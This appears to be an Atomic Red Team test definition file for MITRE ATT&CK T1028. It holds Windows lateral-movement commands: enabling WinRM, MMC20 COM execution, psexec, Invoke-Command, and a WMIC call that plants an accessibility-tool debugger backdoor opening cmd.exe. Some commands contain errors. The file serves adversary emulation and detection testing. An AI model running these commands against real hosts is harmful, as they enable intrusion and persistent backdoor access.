Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
111 lines
2.7 KiB
YAML
111 lines
2.7 KiB
YAML
---
|
|
attack_technique: T1028
|
|
display_name: Windows Remote Management
|
|
|
|
atomic_tests:
|
|
- name: Enable Windows Remote Management
|
|
description: |
|
|
Powershell Enable WinRM
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: true
|
|
command: |
|
|
Enable-PSRemoting -Force
|
|
|
|
- name: PowerShell Lateral Movement
|
|
description: |
|
|
Powershell lateral movement using the mmc20 application com object
|
|
|
|
Reference:
|
|
|
|
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
computer_name:
|
|
description: Name of Computer
|
|
type: string
|
|
default: computer1
|
|
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
|
|
|
|
- name: WMIC Process Call Create
|
|
description: |
|
|
Utilize WMIC to start remote process
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
user_name:
|
|
description: Username
|
|
type: String
|
|
default: DOMAIN\Administrator
|
|
password:
|
|
description: Password
|
|
type: String
|
|
default: P@ssw0rd1
|
|
computer_name:
|
|
description: Target Computer Name
|
|
type: String
|
|
default: Target
|
|
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
|
|
|
- name: Psexec
|
|
description: |
|
|
Utilize psexec to start remote process
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
user_name:
|
|
description: Username
|
|
type: String
|
|
default: DOMAIN\Administrator
|
|
password:
|
|
description: Password
|
|
type: String
|
|
default: P@ssw0rd1
|
|
computer_name:
|
|
description: Target Computer Name
|
|
type: String
|
|
default: Target
|
|
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
psexec \\host -u domain\user -p password -s cmd.exe
|
|
|
|
- name: Invoke-Command
|
|
description: |
|
|
Execute Invoke-command on remote host
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
host_name:
|
|
description: Remote Windows Host Name
|
|
type: String
|
|
default: Test
|
|
remote_command:
|
|
description: Command to execute on remote Host
|
|
type: String
|
|
default: ipconfig
|
|
executor:
|
|
name: powershell
|
|
command: |
|
|
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
|